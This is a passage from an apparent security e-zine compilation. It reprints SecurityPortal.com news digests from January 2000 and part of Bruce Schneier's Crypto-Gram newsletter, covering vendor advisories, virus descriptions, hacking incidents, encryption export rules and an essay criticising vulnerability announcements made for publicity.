Security-based virtual private network. The question is: Will established VPN products from other vendors work with Microsoft's technology? New Internet Explorer vulnerability discovered by Guninski - Georgi Guninski posted a new advisory concerning a new IE 5 security vulnerablity - circumventing Cross-frame security policy and accessing the DOM of "old" documents. This vulnerability can potentially allow access to local data. No response from Microsoft yet Securing E-Business in the New Millennium - this article states the real threat will continue to be from within, and provides advice on the primarily low tech preventative measures any organization should take Jan 10, 2000 Sophos: Virus found on magazine CD ROM - The WM97/Ethan virus was accidentally distributed on the December 1999 cover CD ROM of Developers Review magazine. The CD ROM, entitled Bonus CD - Issue 13 - December 1999, contains one file infected by the WM97/Ethan virus: POPKIN\WHATSNEW.DOC Cisco: Field Notice: Cisco Secure PIX Firewall Software Version 4.43 Deferral - Any PIX Firewall on which version 4.43 software is present will continuously reboot. No other released versions of PIX Firewall are affected ******* What's new with SecurityPortal.com ******* Email Bombing Denial of Service (DoS) attacks, strange variants in the computer crime arena, often occur without clear economic motive. Usually, they arise from anarchistic impulses within the computer underground. And, email bombing is one of the easiest DoS attacks for the Huns of the Internet to perfect. Read the story here . Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com @HWA 17.0 Security Portal review Jan 24th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Write Your Information Security Policies In A Day! INFORMATION SECURITY POLICIES MADE EASY is a kit, text and CD, of 1000+ already-written security policies by internationally-known consultant Charles Cresson Wood. ISPME has JUST BEEN UPDATED and is now available in Version 7! ISPME v7 is the most comprehensive collection of policies available covering the latest technology developments and infosec topics. Each of these policies is accompanied by commentary detailing policy intention, audience, and the circumstances where it applies. Save weeks of time and thousands of dollars developing policies for information security manuals, systems standards, etc. with no consultant fees. Visit us at http://www.baselinesoft.com for more information. ******* What's new with SecurityPortal.com ******* The Clock Strikes Midnight for RSA In a date more feared by RSA Security than Y2K, the patent for the venerable RSA data encryption algorithm will expire on September 20th of this year. No longer will RSA be able to charge royalties for the algorithm, first published by Ron Rivest, Adi Shamir and Leonard Adelman in 1977 and patented in 1983. After patent expiration, the algorithm will become part of the public domain, and companies will be free to incorporate the algorithm into their products without paying RSA any type of royalty or licensing fee. Although the demise of a 17 year patent for widely used technology is a big deal, there is also a distinct possibility that, like Y2K, it will turn out to be a non-event due to the momentum of the established security industry. Read the full story here. ******* Vendor Corner ******* NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. With Entrust@YourService, you're choosing: * the leader in bringing trust to e-business * a solution that will evolve with your e-business needs * a single, reliable trust backbone for all that you do Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2 ******* Top News ******* January 24, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news : Jan 24, 2000 IDG: NEC to unveil world's strongest encryption system - NEC says it will unveil a new encryption technology on Monday that it claims to be the world's strongest ZDNet: Mitnick: I was manipulated - Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years Jan 21, 2000 Microsoft: Patch Available for "RDISK Registry Enumeration File" Vulnerability - Microsoft has released a patch that eliminates a security vulnerability in an administrative utility that ships with Microsoft® Windows NT® 4.0, Terminal Server Edition. The utility creates a temporary file during execution that can contain security-sensitive information, but does not appropriately restrict access to it. As a result, a malicious user on the terminal server could read the file as it was being created. CNN: Microsoft vows security commitment on Windows 2000 - Microsoft is pledging a firm commitment to security with measures such as equipping its upcoming Windows 2000 operating system with 128-bit encryption and interacting with users and rival vendors to detect software breaches and bugs, a high-ranking company official said in a keynote speech at the RSA Conference 2000 show here Tuesday. iDEFENSE and Internet Security Systems Form Strategic Alliance - Infrastructure Defense, Inc. (iDEFENSE), a leading intelligence and risk management consulting company, and Internet Security Systems (ISS) (Nasdaq: ISSX), a leading provider of security management solutions for e-business, announced today a strategic agreement to integrate iDEFENSE and ISS capabilities, providing customers with an expanded line of information security offerings. As a result of the agreement, iDEFENSE and ISS will share expertise, data and resources as well as resell each company's products and services to respective customers ZDNet: Hacker Mitnick to be released Friday - Come Friday, for the first time since 1995, Kevin Mitnick will be free. Will he hack again? OpenBSD Security Advisory: procfs - Systems running with procfs enabled and mounted are vulnerable to having the stderr output of setuid processes directed onto a pre-seeked descriptor onto the stack in their own procfs memory FreeBSD Security Advisory: make - make uses the temporary file in an insecure way, repeatedly deleting and reusing the same file name for the entire life of the program. This makes it vulnerable to a race condition wherein a malicious user could observe the name of the temporary file being used, and replace the contents of a later instance of the file with her desired commands after the legitimate commands have been written Jan 20, 2000 Currents: Virus Attacks Cost 12Bil - Virus attacks cost organizations a total of $12.1 billion during 1999, according to a report released today. Released by Computer Economics, the report said that over the last three years there has been a major programming shift as viruses have become far more malicious and specifically designed for destruction and damage UnionTribune: Global Health hit by hacker - A Poway company selling health products over the Internet was the apparent victim of a "hacker," who took information containing customer names and credit-card numbers and posted them on a Web site. The incident occurred Monday when someone accessed a little-used Web site kept by Global Health Trax, posted information that had been deleted months ago, then tipped off a reporter for MSNBC about it Wired: Say Hello to the NSA - It wasn't hard to do if you were at the RSA Security conference this week in San Jose. The National Security Agency was there, like any other exhibitor, to be seen and promote technology partnerships Microsoft Bulletin: Malformed Conversion Data Vulnerability - Microsoft has released a patch that eliminates a security vulnerability in a utility that converts Japanese, Korean and Chinese Microsoft Word 5 documents to more-recent formats. A patch is available for the buffer overflow problem Computer Currents: Symantec Gets Anti Virus Patent - Symantec has announced that a key technology in its Striker anti-virus engine has been granted patent rights by the US Patent and Trademark office. The firm said that the next-generation technology enables the Striker engine to detect complex polymorphic, or self-mutating, viruses much more rapidly than traditional anti-virus engines Wired: Clinton Favors Computer Snooping - The Clinton administration wants to be able to send federal agents armed with search warrants into homes to copy encryption keys and implant secret back doors onto computers Computer Currents: Encryption Challenge Beaten - A 56-bit security challenge laid down by CS Communication & Systemes in March, 1999, has been cracked in just two months by a team of students working with no less than 38,000 Internet users around the world TechWeb: Washington Rep: Encryption Rules Need Work - interview with Rep Bob Goodlatte. "We think it is almost, but not quite, a 180-degree turn from [previous policy]," Goodlatte said. "But the problem is the implementation of it. They've made the application process [for encryption export] complex and cumbersome." The Fastest Growing Crime in America: Identity Theft - One of the nation's fastest-growing crimes is identity theft. Using a variety of methods, criminals obtain key pieces of a person's identity and fraudulently use that information for various illegal reasons. Some law enforcement officials estimate about 3,000 cases of identity theft a day within the United States Jan 19, 2000 InformationWeek: Security Vendors Intro Wireless Tools - With the ongoing convergence of Internet and wireless devices such as cell phones and personal digital assistants, there's heightened awareness of security issues among vendors and customers. At the RSA 2000 Security Convention in San Jose, Calif., this week, vendors addressed the issue with a variety of new products and alliances InformationWeek: Cisco To Acquire Two VPN Vendors - Looking to give users options for building virtual private networks, Cisco Systems today disclosed plans to supplement its product portfolio by buying VPN vendors Altiga Networks and Compatible Systems for a combined 567 million in stock Canoe: Dodging a hack attack - Just how safe is your data on the Net? The stories are scary: Just before Christmas, a 14-year-old kid was arrested in Toronto after hacking a company's site and changing the passwords. He was arrested when he showed up to collect his $5,000 ransom. A couple of weeks later, a Russian hacker, 'Maxim,' held 300,000 credit card numbers hostage, demanding CDUniverse pay him US$100,000. To make good on his threat, he started posting the information publicly. So far, CDUniverse hasn't paid. And Monday, computer hackers vandalized the 'Thomas' Web site of the U.S. Library of Congress NAI: W32/Ska2K.worm virus, Risk Low - This edition of the worm is only a minor variation of the original first identified in February 1999. This worm is detected with current DAT files. The file may be received by email with a size of 10,000 bytes. The worm if run will patch WSOCK32.DLL to promote distribution by email on the host system if the email application supports SMTP email communication. If the host supports this environment, emails when sent from the host will be followed by a second message with the worm either attached or included as MIME TechWeb: Zero Knowledge Hires Open Source Guru - Mike Shaver, who headed developer relations for the Mozilla.org project, is joining Zero-Knowledge Systems, a Montreal company rolling out an identity-cloaking Internet service Kurt's Closet: SuSE Linux - a vendor gets security conscious - a look at the built in security features of SuSE Linux, including an interview with SuSE security maven Marc Heuse MSNBC: "Smurf Attack" snarls web service in Seattle over the weekend - A "smurf" attack or series of attacks on an Internet service provider snarled Wide World Web traffic in as much as 70 percent of the region last weekend, operators of the service say. See http://securityportal.com/cover/coverstory19990531.html to learn about Smurf Amplifier Attacks Jan 18, 2000 Response: Some thoughts on (network) intrusion detection systems - Kurt Seifried responds to the article featured prominently at Linux Today questioning his analysis of the shortcomings of network-based intrusion detections. (How much confidence do you have in your ID tools?) Sophos: Guidelines for Safe Hex - As well as keeping your anti-virus software up to date there are other ways in which you can reduce the chances of virus infection inside your company. We list some of the guidelines you might like to consider for safer computing in your organisation TechnologyPost: Hackers target Visa, other big firms - Visa International has confirmed British press reports at the weekend that its global network was sniffed by hackers or similar people unknown last summer, but that its security systems locked down the on-line sessions before any systems break-ins occurred Wired: Online Security Remains Elusive - As e-business lights up the Web, the critical matter of data security is headed for center stage. There have been too many security failures in the past and it's going to get worse, said Paul Kocher, president and chief scientist for Cryptography Research FoxNews: Artificial Immunology - Protection and recovery efforts from hack attacks and viruses account for 2.5 percent - or 25 billion - of global spending on information technology each year. The costs are so high mainly due to labor-intensive data recovery and productivity loss from downed systems Sophos: WM97/Marker-BU a Word 97 macro virus - WM97/Marker-BU is a variant of Marker-R with various changes, and has been seen in the wild. If the date is between 23rd and 31st of July the virus changes the Application.Caption from Microsoft Word to Happy Birthday Shankar-25th July. The world may Forget but not me. It then displays a message box asking Did You curse Shankar on his Birthday? If you answer Yes another message box appears saying Thank You! I love you. are u free tonight? However, if you click No a message box appears saying You are Heart Less. The virus then makes changes to the document summary TechWeb: Entrust Launches Security Outsourcing - Entrust, a provider of public key infrastructure and digital certificate security applications, on Monday unveiled plans to provide outsourced security services for business-to-business and business-to-consumer transactions, and said it has partnered with Cash Tax to host the service InfoWorld: Panelists debate the issues surrounding cryptography - Issues including ease of use, governmental regulations, and wireless systems will be at the forefront of the cryptography realm in upcoming years, a panel of specialists said Monday at the RSA Conference 2000 show. The panelists, with affiliations ranging from the Massachusetts Institute of Technology to Sun Microsystems, urged that a variety of actions be taken by the industry Wired: 56 a Bit Short of Secure - The collective crackers of Distributed.net have knocked off another 56-bit encryption key, this time in just over two months InfoWorld: Verisign aims to secure wireless transactions - At the RSA Conference 2000 show here on Monday, VeriSign unveiled a set of technologies, services, and alliances to promote trusted, wireless Internet commerce. Citing the growth in usage of wireless devices, VeriSign Vice President of Worldwide Marketing Richard Yanowitch said that the initiative is intended to provide a complete trust infrastructure to the wireless world PCWorld: The Web Is a Hacker's Playground - Can the Net be crime-proofed? Not as long as there are sloppy programmers and clever cat burglars Microsoft Bulletin: Malformed RTF Control Word - The control information is specified via directives called control words. The default RTF reader that ships as part of many Windows platforms has an unchecked buffer in the portion of the reader that parses control words. If an RTF file contains a specially-malformed control word, it could cause the application to crash. A patch is available for this vulnerability, which can causes a Denial of Service condition in all Microsoft Operating Systems Jan 17, 2000 FCW: NSA grapples with Linux security - The National Security Agency, the super-secret arm of the Defense Department responsible for signals intelligence and information systems security, last week tapped Secure Computing Corp. to develop a secure version of the Linux operating system IDG: Film studios bring claim against DVD hackers - Eight major motion picture companies late last week filed injunction complaints in U.S. Federal Court against three alleged hackers to prevent them from publishing an unauthorized DVD de-encryption program on their Web sites ******* What's new with SecurityPortal.com ******* The Unbreakable Cipher: Why Not Just Stay With Perfection? John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here. Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com @HWA 18.0 Security Portal Review Jan 31st ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Sponsored by VeriSign - The Internet Trust Company Protect your servers with 128-bit SSL encryption today! Get VeriSign's FREE guide, "Securing Your Web Site for Business". It tells you everything you need to know about using SSL to encrypt your e-commerce transactions for serious online security. Click here! http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000 ******* What's new with SecurityPortal.com ******* Information Warfare As the latest buzzword to succeed Y2K on the media's "terror throne," information warfare (IW), as a useful term, begs for realistic definition. No doubt, bin Laden can attack us. Graduate students at Cal Tech, MIT, or UCLA and tenth-graders at your local high school can also launch "volleys" against corporate America. How effective such invasions would be is the critical issue. In the Gulf War, Iraqi anti-aircraft batteries expended vast rounds against allied planes, and it was almost totally ineffective. Sheer bulk doesn't always equate to victory. Read the full story here. A Practical Guide to Cryptography What is it, where do I get it and how do I use it? Kurt Seifried has developed a How-to for using cryptography with several operating systems. Find the guide here. ******* Vendor Corner ******* NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. With Entrust@YourService, you're choosing: * the leader in bringing trust to e-business * a solution that will evolve with your e-business needs * a single, reliable trust backbone for all that you do Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2 ******* Top News ******* January 31, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news : Jan 31, 2000 ZDNet: What´s wrong with Microsoft security? - The term "Microsoft's latest security glitch" has become a cliche. But it didn't have to Jan 28, 2000 Wired: Fast, Simple ... and Vulnerable - A online bank's opening has been marred by a glitch that let customers transfer money from any U.S. bank account. Anyone who knew what they were doing could move funds to an X.com bank account and then withdraw them ZDNet: Win2000 security hole a 'major threat' - Six banks and three major PC makers affected by bug that lets attackers view files stored on Microsoft Index Server. Microsoft issues patch. CNN: DoubleClick suit filed - Woman accuses Net advertising firm of privacy violations TechWeb: Axent To Develop Linux Firewall With Cobalt - E-security vendor Axent Technologies Thursday unveiled a partnership with Cobalt Networks under which the companies will produce a Linux firewall and virtual private network appliance for small to midsize companies, branch offices, and service providers ComputerWorld: Congress backs federal efforts on Y2K, is wary on security - Fernando Burbano, the CIO at the U.S. Department of State, said federal agencies don't have the money to pursue critical infrastructure protection initiatives LinuxJournal: Crackers and Crackdowns - DeCSS author Jon Lech Johansen's home was raided by special police forces at the whim of the Motion Picture Association, an organization which affectionately refers to itself as "a little State Department". Mercury Center: Student charged with hacking - A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers. InternetNews: Hackers Close Japanese Government Sites - So far this week, hackers have made three successful attacks on the official Web sites of two Japanese government agencies, altering the agencies' homepages and possibly deleting government data. ZDNet: Smart card 'inventor' lands in jail - Serge Humpich says he was wasn't really stealing subway tokens -- just testing his new invention. It could cost him seven years. Jan 27, 2000 Wired: U.S. to Push China on Encryption - The United States will press China to explain new regulations on encryption technology at a meeting of economic leaders in Davos, Switzerland, U.S. Trade Representative Charlene Barshefsky said Thursday. TheRegister: New hack attack is greater threat than imagined - It was news a month ago; days later it vanished. The mainstream press may have forgotten it, but security specialists gathered in California last week for the sixth RSA Conference to consider the growing trend in malicious computer assaults called distributed denial of service (DDoS) attacks. Dealing with this sort of assault can be maddening for the primary victim. The clients from which the attack is launched are themselves intermediate victims who rarely know that their systems have been compromised. They are in diverse locations around the world, administered by people who speak different languages, making it nearly impossible for one victim to explain to another how to cope with the threat ZDNet: Does DoubleClick track too closely? - Many e-shoppers don't realize that companies like DoubleClick's Abacus Direct pick up your trail at one of their sites and follow it wherever you go vnunet: Visa strengthens network after number kidnap - Last week a Visa spokesman admitted that hackers had penetrated its computer network last July, but stressed that they were detected almost immediately. The company has since hardened its systems and the hackers have not returned, he said TheRegister: New crypto technique beats current standard - Called Cipherunicorn-A, the technique creates a number of false keys in addition to the true encryption key, making it more difficult for potential intruders to crack. The approach should increase security while remaining compliant with the Data Encryption Standard (DES) introduced by the US Department of Commerce, a company spokesperson told The Register CNet: Corel hurries to fix Linux security hole - Corel is working to patch a bug with its version of Linux that could let unauthorized users gain access to machines running Corel Linux, with a program called Corel Update ZDNet: Bernstein crypto case to be reheard - A U.S. Appeals Court panel will reconsider an earlier ruling striking down export limits on computer data scrambling products in light of new export rules announced this month by the White House Microsoft Bulletin: Index Server - This patch eliminates two vulnerabilities whose only relationship is that both occur in Index Server. The first is the "Malformed Hit-Highlighting Argument" vulnerability. The second vulnerability involves the error message that is returned when a user requests a non-existent Internet Data Query file SCO Security Advisories: rtpm, scohelp - patches are available for buffer overflow vulnerabilities in rtpm, scohelp CNN: Security improvements made at national labs - Security at nuclear weapons labs has made "monumental strides" in the past year, but computer protection is still not 100 percent, the Energy Department's top security official says. Jan 26, 2000 Wired: Echelon 'Proof' Discovered - References to a project Echelon have been found for the first time in declassified National Security Agency documents, says the researcher who found them. Researcher claims there is no evidence over mis-use of the system Industry Standard: China Installs Net Secrecy Rules - China clamped new controls onto the Internet on Wednesday to stop Web sites from "leaking state secrets" and an official newspaper said curbs on news content were on the way BBC: Old computer viruses still bite - An analysis of the most common computer viruses of 1999 shows that although the threat of new self-propagating viruses is growing, older viruses are still very common. One boot sector virus, Form, is nearly a decade old but still appears in the top ten FCW: Clinton aides fight for cybersecurity bill - Senior Clinton administration officials are urging Congress to support a bill that would provide a defense against criminals who now have access to more secure communications thanks to new encryption export regulations released this month ZDNet: Scam tricks users into 'stealing' - So just what do computer criminals do with stolen credit cards? How about tricking innocent electronics shoppers into stealing on their behalf? That's how at least one scam artist is playing the online credit card game, MSNBC has learned Why random numbers are important for security - Modern computer security requires some level of encryption to be applied to various kinds of data, for example secure web transactions, or SSH. But something that often goes ignored is the fact that all good crypto relies on some degree of randomness, which if not fulfilled properly can lead to a significant loss in the strength of encryption Sophos: XM97/Divi-A Excel 97 Macro virus - XM97/Divi-A is an Excel spreadsheet macro virus. It creates a file called BASE5874.XLS in the Excel template directory, and will infect other spreadsheets as they are opened or closed Caldera: Advisory number: CSSA-1999-039.0 Various security problems with majordomo - There are several bugs in majordomo that allow arbitrary users to execute commands with the privilege of majordomo. If the sendmail aliases file contains aliases that invoke majordomo, a compromise of additional system accounts is possible, which may further on lead to a root compromise. An immediate root exploit has not been found however Jan 25, 2000 MontrealGazette: How safe is voice mail? - When Steven Boudrias was charged recently with infiltrating the Montreal Urban Community police department's voice-mail system, the question blinking alongside the message light on most people's phones is how safe electronic call-answering really is Intelligence Gathering on the Net - Prerequisites for computer security professionals include a knowledge of networking, scripting languages, operating systems, and security countermeasures. High-level technical savvy marks the true professional; such expertise, however, carries a practitioner only so far. An effective professional also listens for what's coming down the track Fairfax: Big keys unlock door to strong encryption - Australians will find it much easier to get strong cryptography protection for their on-line business activities following the United States Government's 14 January decision to liberalise its export restrictions HP Bulletin: Security Vulnerability with PMTU strategy - An HP-UX 10.30/11.00 system can be used as an IP traffic amplifier. Small amounts of inbound traffic can result in larger amounts of outbound traffic Sophos: WM97/Melissa-AK virus - WM97/Melissa-AK is a variant of WM97/Melissa. It will attempt to email a copy of the infected document to the first 50 entries in the Outlook address book. If the current day of the month is equal to the current minute it will insert the phrase Symbytes Ver. 7.x mucking about..The Mahatma. into the active document Cisco: IPsec/CEF Software Defect on Route Switch Processors - On all RSP and RSM processors, when an interface in the router is configured with an IPSec crypto map and the switching mode is Cisco Express Forwarding (CEF), the RSP and RSM will restart when it attempts to decrypt IPSec packets. Patch not yet available, workaround is to disable Cisco Express Forwarding Sunday Times: French spies listen in to British calls - French intelligence is intercepting British businessmen's GSM calls after investing millions in satellite technology for its listening stations Computer Currents: Cybercrime Harder to Prosecute - US Justice Department officials reportedly called computer crime a growing menace to corporations worldwide, and admitted that law enforcement agents face major hurdles in combating it ZDNet: Hackers impersonate AOL users - Teenage hackers are pretending to be AOL users, then coercing friends into divulging personal information Jan 24, 2000 ABCNews: Law Enforcement Is Rushing to Catch the Online Crime Wave - From Web site hackers to child pornographers, credit card thieves and e-mail terrorists, crime online is mushrooming, says Schwartz. And the crime fighters are struggling to catch up Wired: More Bad News for DVD Hackers - Judge William J. Elfving issued a preliminary injunction Friday ordering 21 defendants to stop posting code that breaks through the security software of DVDs to their Web sites Wired: Outpost Leaves Data Unguarded - While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too ******* What's new with SecurityPortal.com ******* The Unbreakable Cipher: Why Not Just Stay With Perfection? John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here. Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com @HWA 19.0 CRYPTOGRAM Jan 15th ~~~~~~~~~~~~~~~~~~~ Forwarded From: Bruce Schneier CRYPTO-GRAM January 15, 2000 by Bruce Schneier Founder and CTO Counterpane Internet Security, Inc. schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 2000 by Bruce Schneier ** *** ***** ******* *********** ************* In this issue: "Key Finding" Attacks and Publicity Attacks Counterpane -- Featured Research News New U.S. Encryption Regulations Counterpane Internet Security News The Doghouse: Netscape Block and Stream Ciphers Comments from Readers ** *** ***** ******* *********** ************* "Key Finding" Attacks and Publicity Attacks A couple of weeks ago the New York Times reported a new "key finding" attack. This was a follow-up to some research discussed here some months ago, showing how to search for, and find, public and private cryptographic keys in software because of their random bit patterns. The company nCipher demonstrated that someone who has access to a Web server that uses SSL can find the SSL private key using these techniques, and potentially steal it. nCipher's press release talked of "a significant vulnerability to today's Internet economy." Huh? Why is this news? It's not the fact that the SSL private keys are on the Web server. That's obvious; they have to be there. It's not the fact that someone who has access to the Web server can potentially steal the private keys. That's obvious, too. It's not the news that a CGI attack can compromise data on a Web server. We've seen dozens of those attacks in 1999. Even the press release admits that "no information is known to have been compromised using a 'key-finding' attack. Neither nCipher nor the New York Times found anyone who was vulnerable. But wait . . . nCipher sells a solution to this "problem." Okay, now I understand. I call this kind of thing a publicity attack. It's a blatant attempt by nCipher to get some free publicity for the hardware encryption accelerators, and to scare e-commerce vendors into purchasing them. And people fall for this, again and again. This kind of thing is happening more and more, and I'm getting tired of it. Here are some more examples: * An employee of Cryptonym, a PKI vendor, announced that he found a variable with the prefix "NSA" inside Microsoft's cryptographic API. Based on absolutely zero evidence, this was held up as an example of NSA's manipulation of the Microsoft code. * Some people at eEye discovered a bug in IIS last year, completely compromising the product. They contacted Microsoft, and after waiting only a week for them to acknowledge the problem, they issued a press release and a hacker tool. Microsoft rushed a fix out, but not as fast as the hackers jumped on the exploit. eEye sells vulnerability assessment tools and security consulting, by the way. I'm a fan of full disclosure -- and definitely not a fan of Microsoft's security -- and believe that security vulnerabilities need to be publicized before they're fixed. (If you don't publicize, the vendors often don't bother fixing them.) But this practice of announcing "vulnerabilities" for the sole purpose of hyping your own solutions has got to stop. Here are some examples of doing things right: * The University of California Berkeley researchers have broken just about every digital cellphone security algorithm. They're not profiting from these breaks. They don't publish software packages that can listen in on cellphone calls. This is research, and good research. * Georgi Guninski has found a huge number of JavaScript holes over the past year or so. Rather than posting scary exploits and cracking tools that script kiddies could take advantage of, and rather than trying to grab the limelight, he has been quietly publishing the problems and available workarounds. Of course, the downside is that these bugs get less attention from Microsoft and Netscape, even though they are as serious as many others that have received more press attention and thus get fixed quickly by the browser makers. Nonetheless, this is good research. * The L0pht has done an enormous amount of good by exposing Windows NT security problems, and they don't try to sell products to fix the problems. (Although now that they've formed a VC-funded security consulting company, @Stake, they're going to have to tread more carefully.) * Perfecto markets security against CGI attacks. Although they try to increase awareness of the risks, they don't go around writing new CGI exploits and publicizing them. They point to other CGI exploits, done by hackers with no affiliation to the company, as examples of the problem. * Steve Bellovin at AT&T labs found a serious hole in the Internet DNS system. He delayed publication of this vulnerability for years because there was no readily available fix. How do you tell the difference? Look at the messenger. Who found the vulnerability? What was their motivation for publicizing? The nCipher announcement came with a Business Wire press release, and a PR agent who touted the story to reporters. These things are not cheap -- the press release alone cost over $1000 -- and should be an obvious tip-off that other interests are at stake. Also, look critically at the exploit. Is it really something new, or is it something old rehashed? Does it expose a vulnerability that matters, or one that doesn't? Is it actually interesting? If it's old, doesn't matter, and uninteresting, it's probably just an attempt at press coverage. And look at how it is released. The nCipher release included a hacker tool. As the New York Times pointed out, "thus making e-commerce sites more vulnerable to attack and more likely to buy nCipher's product." Announcements packaged with hacker tools are more likely to be part of the problem than part of the solution. I am a firm believer in open source security, and in publishing security vulnerabilities. I don't want the digital cellphone industry, or the DVD industry, to foist bad security off on consumers. I think the quality of security products should be tested just as the quality of automobiles is tested. But remember that security testing is difficult and time-consuming, and that many of the "testers" have ulterior motives. These motives are often just as much news as the vulnerability itself, and sometimes the announcements are more properly ignored as blatant self-serving publicity. The NY Times URLs using their search function change daily, but you can go to http://search.nytimes.com/plweb-cgi/ and use the Extended Search; the article title is "Attacks on Encryption Code Raise Questions About Computer Vulnerability". NCipher's press release: http://www.ncipher.com/news/files/press/2000/vulnerable.html NCipher's white paper (Acrobat format): http://www.ncipher.com/products/files/papers/pcsws/pcsws.pdf ** *** ***** ******* *********** ************* Counterpane -- Featured Research "A Cryptographic Evaluation of IPsec" N. Ferguson and B. Schneier, to appear We perform a cryptographic review of the IPsec protocol, as described in the November 1998 RFCs. Even though the protocol is a disappointment -- our primary complaint is with its complexity -- it is the best IP security protocol available at the moment. http://www.counterpane.com/ipsec.html ** *** ***** ******* *********** ************* News You can vote via the Internet in the Arizona Democratic primary. Does anyone other than me think this is terrifying? http://dailynews.yahoo.com/h/nm/19991217/wr/arizona_election_1.html An expert at the British government's computer security headquarters has endorsed open-source solutions as the most secure computer architecture available: http://212.187.198.142/news/1999/50/ns-12266.html The DVD Copy Control Association is pissed, and they're suing everyone in sight. http://www.cnn.com/1999/TECH/ptech/12/28/dvd.crack/ Moore's Law and its effects on cryptography: http://www.newscientist.com/ns/20000108/newsstory2.html Information warfare in the Information Age: http://www.cnn.com/1999/TECH/computing/12/30/info.war.idg/index.html http://www.it.fairfax.com.au/industry/19991227/A59706-1999Dec27.html Radio pirates: In the U.K., some radios can receive a digital signal that causes them to automatically switch to stations playing traffic reports. Hackers have figured out how to spoof the signal, forcing the radio to always tune to a particular station. Good illustration of the hidden vulnerabilities in digital systems. http://news.bbc.co.uk/hi/english/sci/tech/newsid_592000/592972.stm http://uk.news.yahoo.com/000106/18/d6jt.html Well, this sure is inaccurate: http://www.lancrypto.com/algorithms_e.htm Some months ago I mentioned the Y2K notice from Hart Scientific. They now have a sequel: http://www.hartscientific.com/y2k-2.htm RSA "digital vault" software: http://news.excite.com/news/pr/000111/ma-rsa-keon-software E-commerce encryption glitch; a good example of why people are the worst security problem. A programmer just forgot to reactivate the encryption. http://news.excite.com/news/r/000107/17/news-news-airlines-northwest Become an instant cryptography portal. Encryption.com, encryption2000.com, and 1-800-ENCRYPT are for sale. http://news.excite.com/news/bw/000111/wa-azalea-software http://www.encryption.com Mail encryption utility that lets you take back messages you regret sending. Does anyone believe that this is secure? http://www.zdnet.com:80/anchordesk/story/story_4323.html Human GPS implants: http://www.newscientist.com/ns/20000108/newsstory8.html Clinton's hacker scholarships: http://chronicle.com/free/2000/01/2000011001t.htm Microsoft is building a VPN into Windows 2000. Whose tunnel do you want to hack today? http://www.networkworld.com/news/2000/0110vpn.html Someone stole a bunch of credit card numbers from CD Universe, tried extortion, then posted some: http://www.wired.com/news/technology/0,1282,33563,00.html http://www.msnbc.com/news/355593.asp and Cybercash's reaction (with a nice quote about how impregnable their product's security is; way to wave a red flag at the hackers): http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html An interesting three-part article about video surveillance and its effect on society: http://www.villagevoice.com/issues/9840/boal.shtml The system used to fund a series of anti-Bush commercials loosely resembles my "street performer protocol," using the credit card company instead of a publisher as a trusted third party. They validate your card when you pledge, but only charge it if they get enough to run an ad: http://www.gwbush.com/ Street performer protocol: http://www.counterpane.com/street_performer.html You can steal subway rides on the NY City system by folding the Metrocard at precisely the right point. The Village Voice and NY Times ran stories about it, but those are no longer available, at least for free. There's a copy of the NYTimes story here: http://www.monkey.org/geeks/archive/9801/msg00052.html The 2600 "Off the Hook" RealAudio for 2/3/98 talks about it, starting around 54:35. The RealAudio is linked from here: http://www.2600.com/offthehook/1998/0298.html The White House released a national plan to protect America's computer systems from unauthorized intrusions. This plan includes the establishment of the controversial Federal Intrusion Detection Network (FIDNET), which would monitor activity on government computer systems. (So far, there are no plans to monitor commercial systems, but that can change. The government does want to involve industry in this.) The plan also calls for the establishment of an "Institute for Information Infrastructure Protection" and a new program that will offer college scholarships to students in the field of computer security in exchange for public service commitments. The scholarship program seems like a good idea; we need more computer security experts. http://www.thestandard.com/article/display/0,1151,8661,00.html http://dailynews.yahoo.com/h/ap/20000107/ts/clinton_cyber_terrorism_4.html http://news.excite.com/news/ap/000107/01/tech-clinton-cyber-terrorism http://www.msnbc.com/news/355783.asp http://www.computerworld.com/home/print.nsf/all/000107DB3A EPIC analysis: http://www.epic.org/security/CIP/ White House plan (PDF): http://www.whitehouse.gov/WH/EOP/NSC/html/documents/npisp-execsummary-000105 .pdf White House press release: http://www.epic.org/security/CIP/WH_pr_1_7_00.html White House press briefing: http://www.epic.org/security/CIP/WH_briefing_1_7_00.html ** *** ***** ******* *********** ************* New U.S. Encryption Regulations We have some, and they're a big improvement. On the plus side, "retail" encryption products -- like browsers, e-mail programs, or PGP -- will be widely exportable to all but a few countries "regardless of key length or algorithm." On the minus side, the new regulations are complex (an unending stream of work for the lawyers) and will still make it difficult for many people to freely exchange encryption products. They also do not address the Constitutional free speech concerns raised by encryption export controls. Major features of the new regs: * "Retail" encryption products are be exportable, regardless of key length or algorithm, to all but the designated "T-7" terrorist nations. In order to export you need to fill out paperwork. You need to get a retail classification, submit your product to a one-time technical review, and submit periodic reports of who products 